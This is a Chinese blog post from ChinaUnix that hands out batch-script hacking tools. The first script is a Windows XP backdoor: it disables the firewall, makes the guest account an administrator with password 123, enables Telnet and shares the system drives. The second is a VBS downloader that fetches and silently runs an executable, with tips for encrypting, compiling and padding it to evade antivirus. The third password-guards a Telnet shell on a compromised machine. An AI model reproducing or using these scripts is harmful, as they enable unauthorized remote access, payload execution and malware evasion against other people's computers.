Chinaunix首页 | 论坛 | 博客
  • 博客访问: 30479336
  • 博文数量: 708
  • 博客积分: 12163
  • 博客等级: 上将
  • 技术积分: 8240
  • 用 户 组: 普通用户
  • 注册时间: 2007-12-04 20:59
文章分类

全部博文(708)

分类: Java

2009-11-18 17:32:40

注:rem命令是注释命令 使用时可以删除 这里使用只是为了让大家看的更清楚一些..

@echo off
rem 关闭xp自带防火墙
net stop sharedaccess
rem 激活guest账户
net user guest /active:yes
rem 将guest账户的密码设为123
net user guest 123
rem 将guest账户加进管理员组
net localgroup administrators guest /add
rem 将guest账户从宾客组删除
net localgroup guests guest /del
rem 将Telnet服务状态设为自动
sc config tlntsvr start= auto
rem 启动Telnet
sc start tlntsvr
rem 将系统盘共享为C$
net share c$=%systemdrive%
rem 共享Windows目录
net share admin$
rem 将NTLM值设为0
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0 /v NTLM /t REG_DWORD /d 00000000 /f

呼呼..这样的一个后门就写好了 可惜只能针对xp 不知道2003行不行 2000没有这个外部命令(哎 真是郁闷). 我强行写入注册表 卡吧居然没有报警 汗死了...

你也可以自己加账户 不用guest账户来做后门.这样的后门相信肯定不被杀.

小工具之二:批处理下载者

说是批处理下载者 实际上是vbs下载者 看来让大家失望了....有人问了 既然是利用vbs做下载者 那干嘛要利用批处理制作vbs下载者呢 而且批处理运行的时候还有一个黑框....我说 批处理可以加密 然后编译成exe文件之后可以做免杀..而且编译的时候还可以选择隐藏运行..如果使用vbs的话就只能加密(能不能编译我就不知道了 我菜 大家别笑话).那样是过不了卡吧滴     说了这么多废话 大家得用鸡蛋砸我了..

@echo off
echo Set Post = CreateObject("Msxml2.XMLHTTP") >%windir%\dll.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>%windir%\dll.vbs
rem 这是你的下载路径
echo Post.Open "GET","",0 >>%windir%\dll.vbs
echo Post.Send() >>%windir%\dll.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>%windir%\dll.vbs
echo aGet.Mode = 3 >>%windir%\dll.vbs
echo aGet.Type = 1 >>%windir%\dll.vbs
echo aGet.Open() >>%windir%\dll.vbs
echo aGet.Write(Post.responseBody) >>%windir%\dll.vbs
rem c:\1.exe 是保存的路径
echo aGet.SaveToFile "c:\1.exe",2 >>%windir%\dll.vbs
rem 这里是下载后运行时间    1000=1秒     2000=2秒...........
echo wscript.sleep 1000 >>%windir%\dll.vbs
rem c:\1.exe 这里要跟上面的保存路径一样 不然你怎么运行...
echo Shell.Run ("c:\1.exe") >>%windir%\dll.vbs
cscript //nologo %windir%\dll.vbs

(注:dll.vbs的代码

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\1.exe",2
wscript.sleep 1000
Shell.Run ("c:\1.exe")
)

我只把一些要注意的地方注释了一下 其他的地方建议大家不要改吧..加密批处理 我建议大家使用"木林森批处理加密工具"    编译批处理 我建议大家使用quickbfc 这里面有个选项可以隐藏批处理的运行 大家自己研究研究吧 编译之后可以在最底下的零区域加花 达到过卡吧的效果...我去反毒网测试过 %90以上的杀毒软件都过了 如果大家有什么更好的方法    或许可以过更多 甚至全过...编译后的批处理不能加壳 这点最郁闷了 汗    但是加了花以后效果也很好了 就是体积大了点 100多k吧    如果加一些关闭杀毒软件的命令 那效果更好了.

小工具之三:防止别人登录你的Telnet(这名字临时起的 也不知道叫什么好...)

如果有了这个 就算别人得到你的密码 也无法拿到你的cmdshell

实际上就是双重保护 因为登录Telnet的之后将用到Windows\system\login.cmd这个文件 如果在这个文件里放一个检查密码的程序 别人就没法进来啦

@echo off
set password=
set /p password=请输入密码:
rem c:\pass.txt 是密码文件
FOR /F %%I IN (C:\pass.txt) DO SET MY-PWD=%%I
IF "%PASSWORD%" == "%MY-PWD%" goto good
cls
echo 密码错误
set password=
set /p password=请输入密码:
FOR /F %%I IN (C:\pass.txt) DO SET MY-PWD=%%I
IF "%PASSWORD%" == "%MY-PWD%" goto good
cls
echo 密码错误2次!
echo 程序将自动退出
pause>nul
exit

:good
echo 密码正确 你可以进入系统
pause>nul

你要自己建立密码文件 你可以改变密码文件的路径 直接在密码文件里输入你要的密码 比如在里面输入123456 那登录的密码就是123456

只有两次尝试的机会 如果失败的话就自动断开连接了.如果正确就进入系统了.要把这个批处理文件命名为login.cmd并且覆盖windows\system32\login.cmd

你可以备份原来的那个文件...万一以后要用...

阅读(2025) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~